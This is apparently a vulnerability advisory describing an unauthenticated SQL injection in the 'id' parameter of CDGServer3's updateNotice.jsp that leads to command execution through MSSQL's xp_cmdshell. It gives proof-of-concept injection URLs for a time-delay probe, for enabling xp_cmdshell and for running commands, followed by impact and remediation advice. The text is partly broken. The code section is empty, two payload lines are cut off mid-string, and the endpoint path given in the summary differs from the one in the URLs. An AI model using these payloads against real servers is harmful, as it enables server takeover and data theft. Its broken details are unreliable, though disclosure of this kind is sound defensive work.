### Key Information #### Vulnerability Title - **Unauthenticated SQLI Leading to Remote Code Execution (RCE)** #### Vulnerability Overview - An SQL injection vulnerability was discovered in the `id` parameter of the `updateNotice.jsp` endpoint. - This vulnerability allows unauthenticated attackers to execute arbitrary code on the MSSQL server, potentially leading to full server compromise. #### Affected Endpoint - `CDGServer3/pubinfo/updateNotice.jsp` #### Vulnerability Type - RCE (Remote Code Execution) #### Vulnerable Code ```java ``` #### Proof of Concept (PoC) 1. Time-based SQL Injection: ``` https://uri/CDGServer3/parameter/updateNotice.jsp?id=1';WAITFOR DELAY '0:0:10'-- ``` 2. Enable `xp_cmdshell`: ``` https://uri/CDGServer3/parameter/updateNotice.jsp?id=1';EXEC sp_configure 'show advanced option ``` 3. Execute Arbitrary Commands: ``` https://uri/CDGServer3/parameter/updateNotice.jsp?id=1';exec master..xp_cmdshell 'ping fewfiew ``` #### Impact - Full server compromise. - Data leakage. - Denial of Service (DoS) via execution of resource-intensive commands. - Potential lateral movement within the internal network. #### Recommendations 1. Input Validation and Sanitization: Ensure all user inputs are properly sanitized and validated. Use parameterized queries or prepared statements to prevent SQL injection. 2. Principle of Least Privilege: Ensure database users have only the minimum privileges required for application functionality. 3. Disable Dangerous Features: Disable features like `xp_cmdshell` unless absolutely necessary. 4. Regular Security Audits: Conduct regular security audits and code reviews to identify and remediate vulnerabilities. #### Conclusion - The RCE vulnerability in the `updateNotice.jsp` endpoint poses a significant security risk. Immediate remediation is required, including sanitizing user inputs and protecting the database from unauthorized access and code execution.